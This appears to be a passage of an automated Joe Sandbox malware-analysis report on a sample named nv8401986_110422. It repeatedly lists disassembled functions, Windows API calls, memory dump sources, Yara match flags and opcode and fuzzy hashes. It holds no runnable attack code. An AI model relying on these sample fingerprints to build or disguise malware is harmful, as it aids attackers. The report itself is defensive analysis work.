                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Container_base12Container_base12::~_std::_
                                                                                                                                                                                                          • String ID: A valid JSON document must be either an array or an object value.
                                                                                                                                                                                                          • API String ID: 1531518832-2233189945
                                                                                                                                                                                                          • Opcode ID: 9aec7b928dce5fcd69ec209dff565cab410daa6f4332bad21479271b5520b6dc
                                                                                                                                                                                                          • Instruction ID: 43c72d64df9972bd3dd0912d48a8fc7266fd4c00a37c3b19c5e9d7bffa1e1317
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aec7b928dce5fcd69ec209dff565cab410daa6f4332bad21479271b5520b6dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89511F749005499BCB08EFA9D851AEEBBB2BF48304F14C15EE8657B392DB34A905CF64
                                                                                                                                                                                                          Function 0C905291 Relevance: 3.4, Strings: 2, Instructions: 868COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: #,$w
                                                                                                                                                                                                          • API String ID: 0-4160908511
                                                                                                                                                                                                          • Opcode ID: 1b768c840ab6314882e69f56c7e591d41e32ff1a2e9956a79490e9df2d3788d2
                                                                                                                                                                                                          • Instruction ID: 78d042ec9ff59e19f952711db9082b96c7db0494886e14f652d043a589372eeb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b768c840ab6314882e69f56c7e591d41e32ff1a2e9956a79490e9df2d3788d2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4472DF70A40215DFDB20CF85C944BAAB7FAFF85310F22854AEA15AB3D1D774A841CFA5
                                                                                                                                                                                                          Function 00471AC0 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471B6D
                                                                                                                                                                                                          • Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 00471C07
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AsyncTask$Affinity::operator!=CollectionCollection::~_Concurrency::details::Concurrency::details::_Hardware
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3541056932-0
                                                                                                                                                                                                          • Opcode ID: a7e15b6bf1fe2b32b2e8af7cd7265f125dbae52be3405325ccf178e397ec0926
                                                                                                                                                                                                          • Instruction ID: f85fd17d4b2f463e11e139ae07223c83f3fa5c1b858d0a19c26f47913683b5ab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e15b6bf1fe2b32b2e8af7cd7265f125dbae52be3405325ccf178e397ec0926
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78412FB1D00109DFCB08DF99D991AEEB7B5FF58314F20825EE416B72A1EB346A04CB64
                                                                                                                                                                                                          Function 004266E0 Relevance: 3.1, APIs: 2, Instructions: 90windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00433370: GetCurrentProcessId.KERNEL32(00000000), ref: 0043341E
                                                                                                                                                                                                            • Part of subcall function 00433370: PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00433432
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 0042670D
                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00400001), ref: 0042673B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$CurrentPeekPostProcessWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1186865699-0
                                                                                                                                                                                                          • Opcode ID: 79220a0fbb4791ffa07baf951acdfdd28bfd0668920a3206b5710d26085809a1
                                                                                                                                                                                                          • Instruction ID: b0f292c0d3f69f449c4ee74118ed7d11651f29880bd9ca03050c111c46d14f41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79220a0fbb4791ffa07baf951acdfdd28bfd0668920a3206b5710d26085809a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1731A575B002549BDF20EF25E881BD677A4BB40744F4A407AED48AF385E778EC84CBA4
                                                                                                                                                                                                          Function 00416FC0 Relevance: 3.1, APIs: 2, Instructions: 72registrylibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00417013
                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 00417030
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveProcQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1845476169-0
                                                                                                                                                                                                          • Opcode ID: 577a2aa1d182d1bf5596277a2ea1833a6c025b48cdb3e59b88d0fefe25de9a86
                                                                                                                                                                                                          • Instruction ID: e76a618d51df4b7221a631ce92253d388ab90105f1f54e6fa6f6e847c37af94c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 577a2aa1d182d1bf5596277a2ea1833a6c025b48cdb3e59b88d0fefe25de9a86
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39211D75A00209DBDB10DFA8D881AEEBBF8FF59300F10416AE505E7250EB35A995CBA0
                                                                                                                                                                                                          Function 0046EF5B Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 302411478f885b62b6acab54caba617541d94c3c4ff4b13778b21bdc05ee5916
                                                                                                                                                                                                          • Instruction ID: 407a40439a962be098ac36d4a7c646c3fe859bc0c2ab96f520cadb4ca0bc8b90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 302411478f885b62b6acab54caba617541d94c3c4ff4b13778b21bdc05ee5916
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4511EB36A00525BBEB28963ADC44BBB76E4FB44700F21013BF505E3284F768DD0592DE
                                                                                                                                                                                                          Function 00532CE7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00532D47
                                                                                                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00532D54
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2279764990-0
                                                                                                                                                                                                          • Opcode ID: 84b81e3e6fc1c966432d6ef8c698c41b103cef948f54de034a664f9edbf4f00f
                                                                                                                                                                                                          • Instruction ID: bb4f655b4263ea8bf92ae4bff62c4bac67f1da175e9f471d848846b139c4fca0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84b81e3e6fc1c966432d6ef8c698c41b103cef948f54de034a664f9edbf4f00f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B110637A009219B9B269F1CDC4499A7BA5BBC4760F174A21FD15EB258D730EC029BD0
                                                                                                                                                                                                          Function 00473210 Relevance: 3.1, APIs: 2, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00472C90: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472CBB
                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00473273
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004732A1
                                                                                                                                                                                                            • Part of subcall function 00472C20: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472C4B
                                                                                                                                                                                                            • Part of subcall function 00472B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472B6B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::ContextIdentityQueueWork$Affinity::operator!=Hardware
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3741678075-0
                                                                                                                                                                                                          • Opcode ID: 3b08f9e768f756c6c1d930cdf631a008ba3975517345f31637fe52a38965a98a
                                                                                                                                                                                                          • Instruction ID: a43a3ceb674119fd95d00cdbea4e4a4f067b9bb6db4a9680626ed97a934c9717
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b08f9e768f756c6c1d930cdf631a008ba3975517345f31637fe52a38965a98a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38113BB1500108ABCB09EF95D992DEE7378AF44305B10816EB54A9B292DB34AF04DBA9
                                                                                                                                                                                                          Function 00421F00 Relevance: 3.1, APIs: 2, Instructions: 65windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00421FAD
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00421FC1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: 7e2d0363a127c6e42df539bcc3f27a6db5804d579902a258d33fb4ae42fe076a
                                                                                                                                                                                                          • Instruction ID: 493319e5ff258d0f09d61a404a3719b6baa831274e6606e9d5ffacd60155867a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e2d0363a127c6e42df539bcc3f27a6db5804d579902a258d33fb4ae42fe076a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10217CB5D047459FD304CF58C945B56FBE4FB59314F1083AAE8189B381E7B5E984CB90
                                                                                                                                                                                                          Function 004082B0 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0040835E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00408372
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: 6b2f95533a11668970f677aa42b5cbc2466ee801684c3828ab6885be0139297d
                                                                                                                                                                                                          • Instruction ID: 9dff137b79050071dea44d474b9b5e5e5ae0054d96e403483a944a00ca0696ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b2f95533a11668970f677aa42b5cbc2466ee801684c3828ab6885be0139297d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9217AB5904746AFD304CF58C949B56FBE4FB59314F1083AAE8188B381EBB5A984CB90
                                                                                                                                                                                                          Function 0044C6C0 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0044C76E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 0044C782
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: 018ad8622b7fae9efbc5a8c2a1909b36e76453fd4b5589e2d2efec8dfd6ea0dc
                                                                                                                                                                                                          • Instruction ID: 5ffbe53203baa98c48a8f6d03b7e7018eefc68c8e72e4bad9524cd93c68763e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 018ad8622b7fae9efbc5a8c2a1909b36e76453fd4b5589e2d2efec8dfd6ea0dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E217AB59047469FD304CF58C945B56FBE4FB59314F1087AAE8188B381EBB5E984CBD0
                                                                                                                                                                                                          Function 00422E50 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00422EFE
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00422F12
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: c5343e0bc8a78972eca002ad0e101312df85e500386a162fb9adbf6516394203
                                                                                                                                                                                                          • Instruction ID: cb6d6c7aec83fe853d787290955b07201360c29766fb29c8a891b98a155123fc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5343e0bc8a78972eca002ad0e101312df85e500386a162fb9adbf6516394203
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B21ACB5D00346AFD304CF18C944B56FBE4FB49314F1087AAE8189B381EBB5AA84CBD0
                                                                                                                                                                                                          Function 00411370 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0041141E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00411432
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: 66a20f3b0183da1ed033e8371ce4ea211774bd8523529571b9279d1222b949d5
                                                                                                                                                                                                          • Instruction ID: cb227eb65dd549114a14d0a491f91d91ca0bd8a547f75cd41463d909b90baba2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66a20f3b0183da1ed033e8371ce4ea211774bd8523529571b9279d1222b949d5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0921ACB5D00346AFD304CF18C948B56FBE4FB49314F1083AAE8188B381EBB5A984CBD0
                                                                                                                                                                                                          Function 00433370 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 0043341E
                                                                                                                                                                                                          • PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 00433432
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentMessagePostProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3746246500-0
                                                                                                                                                                                                          • Opcode ID: c416d77a3287ae42491025f5a835137afbb8988a3f0f2e03e096b8989e3b3e18
                                                                                                                                                                                                          • Instruction ID: c37505041123e12c38cfe7212d80e677788822172c97a52a2557222ce818afb3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c416d77a3287ae42491025f5a835137afbb8988a3f0f2e03e096b8989e3b3e18
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC218CB5D047469FD304CF58C945B56FBE4FB59314F1083AAE8188B381EBB5A984CBD0
                                                                                                                                                                                                          Function 0043BE40 Relevance: 3.1, APIs: 2, Instructions: 53windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
